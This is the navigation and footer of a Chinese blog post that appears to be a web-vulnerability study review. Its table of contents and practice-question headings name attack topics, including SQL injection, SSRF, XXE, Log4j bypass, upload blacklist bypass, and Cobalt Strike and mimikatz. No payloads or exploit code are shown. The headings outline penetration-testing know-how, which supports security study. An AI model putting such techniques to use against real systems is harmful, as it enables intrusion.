href="#7-XSS%E6%BC%8F%E6%B4%9E"><span class="nav-text">7.XSS漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#8-%E5%B8%B8%E8%A7%81%E7%9A%84%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E"><span class="nav-text">8.常见的解析漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#9-%E5%B8%B8%E8%A7%81%E7%9A%84%E6%BC%8F%E6%89%AB%E5%B7%A5%E5%85%B7%E6%94%AF%E6%8C%81%E6%89%AB%E6%8F%8F%E7%9A%84%E6%BC%8F%E6%B4%9E%E7%B1%BB%E5%9E%8B"><span class="nav-text">9.常见的漏扫工具支持扫描的漏洞类型</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#10-sqlmap%E5%B7%A5%E5%85%B7%E5%8F%82%E6%95%B0%E7%9A%84%E4%BD%BF%E7%94%A8%E5%92%8C%E5%90%AB%E4%B9%89"><span class="nav-text">10.sqlmap工具参数的使用和含义</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#11-%E4%B8%80%E4%BA%9B%E5%B8%B8%E8%A7%81%E6%BC%8F%E6%B4%9E"><span class="nav-text">11.一些常见漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#Tomcat"><span class="nav-text">Tomcat</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#iis"><span class="nav-text">iis</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#apache"><span class="nav-text">apache</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#12-Cobalt-strike-mimikatz%E5%B7%A5%E5%85%B7%E7%9A%84%E4%B8%80%E4%BA%9B%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86"><span class="nav-text">12.Cobalt strike,mimikatz工具的一些基础知识</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#13-%E5%B8%B8%E8%A7%81%E6%A1%86%E6%9E%B6%E6%BC%8F%E6%B4%9E"><span class="nav-text">13.常见框架漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#Jboss"><span class="nav-text">Jboss</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#weblogic"><span class="nav-text">weblogic</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#thinkphp"><span class="nav-text">thinkphp</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Struts2"><span class="nav-text">Struts2</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Shiro"><span class="nav-text">Shiro</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#14-%E5%B8%B8%E8%A7%81%E7%AB%AF%E5%8F%A3%E5%AF%B9%E5%BA%94%E7%9A%84%E6%BC%8F%E6%B4%9E"><span class="nav-text">14.常见端口对应的漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#15-%E4%B8%80%E4%BA%9B%E6%9C%80%E6%96%B0%E7%9A%84%E6%BC%8F%E6%B4%9E"><span class="nav-text">15.一些最新的漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#Log4j2"><span class="nav-text">Log4j2</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#spring-core-rce-2022-03-29"><span class="nav-text">spring-core-rce-2022-03-29</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#16-%E5%B8%B8%E8%A7%81%E7%9A%84web%E6%BC%8F%E6%B4%9E"><span class="nav-text">16.常见的web漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link"><span class="nav-text"></span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#-1"><span class="nav-text"></span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%BB%83%E4%B9%A0%E6%80%9D%E8%80%83%E9%A2%98"><span class="nav-text">练习思考题</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-%E5%A0%86%E6%BA%A2%E5%87%BA%E8%A6%86%E7%9B%96top-chunk%E7%9A%84%E5%A4%A7%E5%B0%8F-house-of-force-%E7%9A%84%E8%AF%B4%E6%B3%95%E6%9C%89%E5%93%AA%E4%BA%9B%EF%BC%9F"><span class="nav-text">1.堆溢出覆盖top chunk的大小(house of force)的说法有哪些？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-6379-8009%E7%AB%AF%E5%8F%A3%E5%AF%B9%E5%BA%94%E7%9A%84%E6%BC%8F%E6%B4%9E%E6%98%AF"><span class="nav-text">2.6379,8009端口对应的漏洞是</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-Cobalt-strike-%E5%8F%AF%E4%BB%A5%E7%94%9F%E6%88%90%E5%93%AA%E4%BA%9B%E7%B1%BB%E5%9E%8B%E7%9A%84shellcode"><span class="nav-text">3.Cobalt strike 可以生成哪些类型的shellcode?</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-Apache-%E6%96%87%E4%BB%B6%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E%E7%9A%84%E5%8E%9F%E7%90%86%EF%BC%9F"><span class="nav-text">4.Apache 文件解析漏洞的原理？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-%E4%BB%80%E4%B9%88%E4%B8%AD%E9%97%B4%E4%BB%B6%E5%AD%98%E5%9C%A8%E7%9F%AD%E6%96%87%E4%BB%B6%E5%90%8D%E6%BC%8F%E6%B4%9E%EF%BC%9F"><span class="nav-text">5. 什么中间件存在短文件名漏洞？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#6-xxe%E6%BC%8F%E6%B4%9E%E5%90%84%E4%B8%AA%E8%AF%AD%E8%A8%80%E6%94%AF%E6%8C%81%E7%9A%84%E4%BC%AA%E5%8D%8F%E8%AE%AE%E6%9C%89%E5%93%AA%E4%BA%9B"><span class="nav-text">6.xxe漏洞各个语言支持的伪协议有哪些</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#7-S2-052%E6%BC%8F%E6%B4%9E%E6%98%AF%E7%94%B1%E4%BA%8E%E4%BB%80%E4%B9%88%E9%80%A0%E6%88%90%E7%9A%84%EF%BC%9F"><span class="nav-text">7.S2_052漏洞是由于什么造成的？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#8-Weblogic-%E5%B8%B8%E8%A7%81%E7%9A%84%E6%BC%8F%E6%B4%9E%E6%9C%89%E5%93%AA%E4%BA%9B%EF%BC%9F"><span class="nav-text">8.Weblogic 常见的漏洞有哪些？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#9-Jboss-%E5%B8%B8%E8%A7%81%E7%9A%84%E6%BC%8F%E6%B4%9E%E6%9C%89%E5%93%AA%E4%BA%9B%EF%BC%9F"><span class="nav-text">9.Jboss 常见的漏洞有哪些？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#10-Struts2-%E5%B8%B8%E8%A7%81%E7%9A%84%E6%BC%8F%E6%B4%9E%E6%9C%89%E5%93%AA%E4%BA%9B%EF%BC%9F"><span class="nav-text">10.Struts2 常见的漏洞有哪些？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#11-Fastbin-%E6%80%8E%E4%B9%88%E5%88%A9%E7%94%A8%EF%BC%9F"><span class="nav-text">11.Fastbin 怎么利用？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#12-Ssrf-%E6%94%BB%E5%87%BB%E7%9A%84%E7%9B%AE%E6%A0%87%E4%B8%BA%EF%BC%9F"><span class="nav-text">12.Ssrf 攻击的目标为？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#13-ssrf-%E6%98%AF%E5%90%A6%E5%8F%AF%E4%BB%A5%E9%80%9A%E8%BF%87%E8%BF%87%E6%BB%A4get%E6%88%96post%E5%8F%82%E6%95%B0%E8%BF%9B%E8%A1%8C%E9%98%B2%E5%BE%A1%EF%BC%9F"><span class="nav-text">13.ssrf 是否可以通过过滤get或post参数进行防御？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#14-Log4j-%E6%80%8E%E4%B9%88%E7%BB%95%E8%BF%87%EF%BC%9F"><span class="nav-text">14.Log4j 怎么绕过？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#15-ogg%E6%98%AF%E5%90%A6%E6%98%AFphp%E7%9A%84%E4%BC%AA%E5%8D%8F%E8%AE%AE%EF%BC%9F"><span class="nav-text">15.ogg是否是php的伪协议？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#16-Zip-%E4%BC%AA%E5%8D%8F%E8%AE%AE%E5%88%A9%E7%94%A8%E5%AF%B9%E5%BA%94%E7%9A%84php%E7%89%88%E6%9C%AC%E5%8F%B7%E4%B8%BA%EF%BC%9F"><span class="nav-text">16. Zip:&#x2F;&#x2F;伪协议利用对应的php版本号为？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#17-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%80%8E%E4%B9%88%E7%BB%95%E8%BF%87%E9%BB%91%E5%90%8D%E5%8D%95-asp%E5%90%8E%E7%BC%80%E7%9A%84%E8%BF%87%E6%BB%A4%EF%BC%9F"><span class="nav-text">17.文件上传怎么绕过黑名单.asp后缀的过滤？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#18-Nginx-apache%E6%98%AF%E5%90%A6%E5%AD%98%E5%9C%A8%E5%BC%B1%E5%8F%A3%E4%BB%A4%EF%BC%9F"><span class="nav-text">18.Nginx,apache是否存在弱口令？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#19-Dom-xss%E5%92%8C%E5%8F%8D%E5%B0%84%E5%9E%8Bxss%E7%9A%84%E5%8C%BA%E5%88%AB%E6%98%AF%E4%BB%80%E4%B9%88%EF%BC%9F"><span class="nav-text">19.Dom xss和反射型xss的区别是什么？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#20-Ms17-010%E6%BC%8F%E6%B4%9E%E6%98%AF%E9%82%A3%E4%B8%AA%E7%AB%AF%E5%8F%A3%E9%80%A0%E6%88%90%E7%9A%84%EF%BC%9F"><span class="nav-text">20.Ms17_010漏洞是那个端口造成的？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#21-Sqlmap-%E4%B8%AD%E8%A6%81%E4%BD%BF%E7%94%A8%E9%9A%8F%E6%9C%BAuser-agent%E5%BA%94%E8%AF%A5%E4%BD%BF%E7%94%A8%E4%BB%80%E4%B9%88%E5%8F%82%E6%95%B0%EF%BC%9F"><span class="nav-text">21.Sqlmap 中要使用随机user-agent应该使用什么参数？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#22-Xp-cmdshell-%E6%98%AF%E9%82%A3%E4%B8%AA%E6%95%B0%E6%8D%AE%E5%BA%93%E4%B8%AD%E5%90%AB%E6%9C%89%E7%9A%84%EF%BC%9F"><span class="nav-text">22.Xp_cmdshell 是那个数据库中含有的？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#23-Symlink%E5%87%BD%E6%95%B0%E6%98%AF%E5%90%A6%E5%8F%AF%E4%BB%A5%E6%89%A7%E8%A1%8C%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4%EF%BC%9F"><span class="nav-text">23.Symlink函数是否可以执行系统命令？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#24-Samba-wannacry%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E6%80%8E%E4%B9%88%E4%BF%AE%E5%A4%8D%EF%BC%9F"><span class="nav-text">24.Samba wannacry溢出漏洞怎么修复？</span></a></li></ol></li></ol></li></ol>
    </div>
</div>

            </div>
        
    </div>
</div>


                
            </div>
        </div>

        <div class="page-main-content-bottom border-box">
            
<footer class="footer border-box">
    <div class="border-box website-info-box default">
        
            <div class="copyright-info info-item default">
                &copy;&nbsp;<span>2022</span>&nbsp;-&nbsp;2024
                
                    &nbsp;<i class="fas fa-heart icon-animate"></i>&nbsp;&nbsp;<a href="/">P1taya</a>
                
            </div>

            <div class="theme-info info-item default">
                由&nbsp;<a target="_blank" href="https://hexo.io">Hexo</a>&nbsp;驱动&nbsp;&&nbsp;主题&nbsp;<a class="keep-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep</a>
            </div>

            

            
        

        <div class="count-item info-item default">
            
                <span class="count-box border-box word">
                    <span class="item-type border-box">总字数</span>
                    <span class="item-value border-box word">79.9k</span>
                </span>
            

            
                <span class="count-box border-box uv">
                    <span class="item-type border-box">访客数</span>
                    <span class="item-value border-box uv" id="busuanzi_value_site_uv"></span>
                </span>
            

            
                <span class="count-box border-box pv">
                    <span class="item-type border-box">访问量</span>
                    <span class="item-value border-box pv" id="busuanzi_value_site_pv"></span>
                </span>
            
        </div>
    </div>
</footer>

        </div>
    </div>

    <!-- post tools -->
    
        <div class="post-tools right-toc">
            <div class="post-tools-container border-box">
    <ul class="tools-list border-box">
        <!-- PC TOC show toggle -->
        
            <li class="tools-item flex-center toggle-show-toc">
                <i class="fas fa-list"></i>
            </li>
        

        <!-- PC go comment -->
        

        <!-- PC full screen -->
        <li class="tools-item flex-center full-screen">
            <i class="fa-solid fa-expand"></i>
        </li>
    </ul>
</div>

        </div>
    

    <!-- side tools -->
    <div class="side-tools">
        <div class="side-tools-container border-box ">
    <ul class="side-tools-list side-tools-show-handle border-box">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <li class="tools-item tool-toggle-theme-mode flex-center">
            <i class="fas fa-moon"></i>
        </li>

        <!-- rss -->
        

        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list border-box">
        
            <li class="tools-item toggle-show-toc-tablet flex-center">
                <i class="fas fa-list"></i>
            </li>
        

        

        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>

        <li class="tools-item tool-scroll-to-top flex-center show-arrow">
            <i class="arrow fas fa-arrow-up"></i>
            <span class="percent"></span>
        </li>
    </ul>
</div>

    </div>

    <!-- image mask -->
    <div class="zoom-in-image-mask">
    <img class="zoom-in-image">
</div>


    <!-- local search -->
    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fas fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="搜索..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="close-popup-btn">
                <i class="fas fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fas fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

    <!-- tablet toc -->
    
        <div class="tablet-post-toc-mask">
            <div class="tablet-post-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#web%E6%BC%8F%E6%B4%9E%E5%A4%8D%E4%B9%A0"><span class="nav-text">web漏洞复习</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-owasp-top-10"><span class="nav-text">1.owasp top 10</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-sql%E6%B3%A8%E5%85%A5"><span class="nav-text">2.sql注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0"><span class="nav-text">3.文件上传</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-SSRF%E6%BC%8F%E6%B4%9E"><span class="nav-text">3.SSRF漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-XXE%E6%BC%8F%E6%B4%9E"><span class="nav-text">4.XXE漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E"><span class="nav-text">5.文件包含漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#6-Php%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%EF%BC%8Cphp%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E7%9B%B8"><span class="nav-text">6.Php命令执行，php代码执行相</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#7-XSS%E6%BC%8F%E6%B4%9E"><span class="nav-text">7.XSS漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#8-%E5%B8%B8%E8%A7%81%E7%9A%84%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E"><span class="nav-text">8.常见的解析漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#9-%E5%B8%B8%E8%A7%81%E7%9A%84%E6%BC%8F%E6%89%AB%E5%B7%A5%E5%85%B7%E6%94%AF%E6%8C%81%E6%89%AB%E6%8F%8F%E7%9A%84%E6%BC%8F%E6%B4%9E%E7%B1%BB%E5%9E%8B"><span class="nav-text">9.常见的漏扫工具支持扫描的漏洞类型</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#10-sqlmap%E5%B7%A5%E5%85%B7%E5%8F%82%E6%95%B0%E7%9A%84%E4%BD%BF%E7%94%A8%E5%92%8C%E5%90%AB%E4%B9%89"><span class="nav-text">10.sqlmap工具参数的使用和含义</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#11-%E4%B8%80%E4%BA%9B%E5%B8%B8%E8%A7%81%E6%BC%8F%E6%B4%9E"><span class="nav-text">11.一些常见漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#Tomcat"><span class="nav-text">Tomcat</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#iis"><span class="nav-text">iis</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#apache"><span class="nav-text">apache</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#12-Cobalt-strike-mimikatz%E5%B7%A5%E5%85%B7%E7%9A%84%E4%B8%80%E4%BA%9B%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86"><span class="nav-text">12.Cobalt strike,mimikatz工具的一些基础知识</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#13-%E5%B8%B8%E8%A7%81%E6%A1%86%E6%9E%B6%E6%BC%8F%E6%B4%9E"><span class="nav-text">13.常见框架漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#Jboss"><span class="nav-text">Jboss</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#weblogic"><span class="nav-text">weblogic</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#thinkphp"><span class="nav-text">thinkphp</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Struts2"><span class="nav-text">Struts2</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Shiro"><span class="nav-text">Shiro</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#14-%E5%B8%B8%E8%A7%81%E7%AB%AF%E5%8F%A3%E5%AF%B9%E5%BA%94%E7%9A%84%E6%BC%8F%E6%B4%9E"><span class="nav-text">14.常见端口对应的漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#15-%E4%B8%80%E4%BA%9B%E6%9C%80%E6%96%B0%E7%9A%84%E6%BC%8F%E6%B4%9E"><span class="nav-text">15.一些最新的漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#Log4j2"><span class="nav-text">Log4j2</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#spring-core-rce-2022-03-29"><span class="nav-text">spring-core-rce-2022-03-29</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#16-%E5%B8%B8%E8%A7%81%E7%9A%84web%E6%BC%8F%E6%B4%9E"><span class="nav-text">16.常见的web漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link"><span class="nav-text"></span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#-1"><span class="nav-text"></span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%BB%83%E4%B9%A0%E6%80%9D%E8%80%83%E9%A2%98"><span class="nav-text">练习思考题</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-%E5%A0%86%E6%BA%A2%E5%87%BA%E8%A6%86%E7%9B%96top-chunk%E7%9A%84%E5%A4%A7%E5%B0%8F-house-of-force-%E7%9A%84%E8%AF%B4%E6%B3%95%E6%9C%89%E5%93%AA%E4%BA%9B%EF%BC%9F"><span class="nav-text">1.堆溢出覆盖top chunk的大小(house of force)的说法有哪些？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-6379-8009%E7%AB%AF%E5%8F%A3%E5%AF%B9%E5%BA%94%E7%9A%84%E6%BC%8F%E6%B4%9E%E6%98%AF"><span class="nav-text">2.6379,8009端口对应的漏洞是</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-Cobalt-strike-%E5%8F%AF%E4%BB%A5%E7%94%9F%E6%88%90%E5%93%AA%E4%BA%9B%E7%B1%BB%E5%9E%8B%E7%9A%84shellcode"><span class="nav-text">3.Cobalt strike 可以生成哪些类型的shellcode?</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-Apache-%E6%96%87%E4%BB%B6%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E%E7%9A%84%E5%8E%9F%E7%90%86%EF%BC%9F"><span class="nav-text">4.Apache 文件解析漏洞的原理？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-%E4%BB%80%E4%B9%88%E4%B8%AD%E9%97%B4%E4%BB%B6%E5%AD%98%E5%9C%A8%E7%9F%AD%E6%96%87%E4%BB%B6%E5%90%8D%E6%BC%8F%E6%B4%9E%EF%BC%9F"><span class="nav-text">5. 什么中间件存在短文件名漏洞？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#6-xxe%E6%BC%8F%E6%B4%9E%E5%90%84%E4%B8%AA%E8%AF%AD%E8%A8%80%E6%94%AF%E6%8C%81%E7%9A%84%E4%BC%AA%E5%8D%8F%E8%AE%AE%E6%9C%89%E5%93%AA%E4%BA%9B"><span class="nav-text">6.xxe漏洞各个语言支持的伪协议有哪些</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#7-S2-052%E6%BC%8F%E6%B4%9E%E6%98%AF%E7%94%B1%E4%BA%8E%E4%BB%80%E4%B9%88%E9%80%A0%E6%88%90%E7%9A%84%EF%BC%9F"><span class="nav-text">7.S2_052漏洞是由于什么造成的？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#8-Weblogic-%E5%B8%B8%E8%A7%81%E7%9A%84%E6%BC%8F%E6%B4%9E%E6%9C%89%E5%93%AA%E4%BA%9B%EF%BC%9F"><span class="nav-text">8.Weblogic 常见的漏洞有哪些？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#9-Jboss-%E5%B8%B8%E8%A7%81%E7%9A%84%E6%BC%8F%E6%B4%9E%E6%9C%89%E5%93%AA%E4%BA%9B%EF%BC%9F"><span class="nav-text">9.Jboss 常见的漏洞有哪些？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#10-Struts2-%E5%B8%B8%E8%A7%81%E7%9A%84%E6%BC%8F%E6%B4%9E%E6%9C%89%E5%93%AA%E4%BA%9B%EF%BC%9F"><span class="nav-text">10.Struts2 常见的漏洞有哪些？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#11-Fastbin-%E6%80%8E%E4%B9%88%E5%88%A9%E7%94%A8%EF%BC%9F"><span class="nav-text">11.Fastbin 怎么利用？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#12-Ssrf-%E6%94%BB%E5%87%BB%E7%9A%84%E7%9B%AE%E6%A0%87%E4%B8%BA%EF%BC%9F"><span class="nav-text">12.Ssrf 攻击的目标为？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#13-ssrf-%E6%98%AF%E5%90%A6%E5%8F%AF%E4%BB%A5%E9%80%9A%E8%BF%87%E8%BF%87%E6%BB%A4get%E6%88%96post%E5%8F%82%E6%95%B0%E8%BF%9B%E8%A1%8C%E9%98%B2%E5%BE%A1%EF%BC%9F"><span class="nav-text">13.ssrf 是否可以通过过滤get或post参数进行防御？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#14-Log4j-%E6%80%8E%E4%B9%88%E7%BB%95%E8%BF%87%EF%BC%9F"><span class="nav-text">14.Log4j 怎么绕过？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#15-ogg%E6%98%AF%E5%90%A6%E6%98%AFphp%E7%9A%84%E4%BC%AA%E5%8D%8F%E8%AE%AE%EF%BC%9F"><span class="nav-text">15.ogg是否是php的伪协议？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#16-Zip-%E4%BC%AA%E5%8D%8F%E8%AE%AE%E5%88%A9%E7%94%A8%E5%AF%B9%E5%BA%94%E7%9A%84php%E7%89%88%E6%9C%AC%E5%8F%B7%E4%B8%BA%EF%BC%9F"><span class="nav-text">16. Zip:&#x2F;&#x2F;伪协议利用对应的php版本号为？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#17-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%80%8E%E4%B9%88%E7%BB%95%E8%BF%87%E9%BB%91%E5%90%8D%E5%8D%95-asp%E5%90%8E%E7%BC%80%E7%9A%84%E8%BF%87%E6%BB%A4%EF%BC%9F"><span class="nav-text">17.文件上传怎么绕过黑名单.asp后缀的过滤？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#18-Nginx-apache%E6%98%AF%E5%90%A6%E5%AD%98%E5%9C%A8%E5%BC%B1%E5%8F%A3%E4%BB%A4%EF%BC%9F"><span class="nav-text">18.Nginx,apache是否存在弱口令？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#19-Dom-xss%E5%92%8C%E5%8F%8D%E5%B0%84%E5%9E%8Bxss%E7%9A%84%E5%8C%BA%E5%88%AB%E6%98%AF%E4%BB%80%E4%B9%88%EF%BC%9F"><span class="nav-text">19.Dom xss和反射型xss的区别是什么？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#20-Ms17-010%E6%BC%8F%E6%B4%9E%E6%98%AF%E9%82%A3%E4%B8%AA%E7%AB%AF%E5%8F%A3%E9%80%A0%E6%88%90%E7%9A%84%EF%BC%9F"><span class="nav-text">20.Ms17_010漏洞是那个端口造成的？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#21-Sqlmap-%E4%B8%AD%E8%A6%81%E4%BD%BF%E7%94%A8%E9%9A%8F%E6%9C%BAuser-agent%E5%BA%94%E8%AF%A5%E4%BD%BF%E7%94%A8%E4%BB%80%E4%B9%88%E5%8F%82%E6%95%B0%EF%BC%9F"><span class="nav-text">21.Sqlmap 中要使用随机user-agent应该使用什么参数？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#22-Xp-cmdshell-%E6%98%AF%E9%82%A3%E4%B8%AA%E6%95%B0%E6%8D%AE%E5%BA%93%E4%B8%AD%E5%90%AB%E6%9C%89%E7%9A%84%EF%BC%9F"><span class="nav-text">22.Xp_cmdshell 是那个数据库中含有的？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#23-Symlink%E5%87%BD%E6%95%B0%E6%98%AF%E5%90%A6%E5%8F%AF%E4%BB%A5%E6%89%A7%E8%A1%8C%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4%EF%BC%9F"><span class="nav-text">23.Symlink函数是否可以执行系统命令？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#24-Samba-wannacry%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E6%80%8E%E4%B9%88%E4%BF%AE%E5%A4%8D%EF%BC%9F"><span class="nav-text">24.Samba wannacry溢出漏洞怎么修复？</span></a></li></ol></li></ol></li></ol>
    </div>
</div>

            </div>
        </div>
    
</main>



<!-- common -->
<script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/js/utils.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/js/header-shrink.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/js/back2top.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/js/toggle-theme.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/js/code-block.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/js/main.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/js/libs/anime.min.js"></script>

<!-- local-search -->

    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/js/local-search.js"></script>


<!-- lazyload -->

    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/js/lazyload.js"></script>


<div class="">
    
        <!-- post-helper -->
        <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/js/post/post-helper.js"></script>

        <!-- toc -->
        
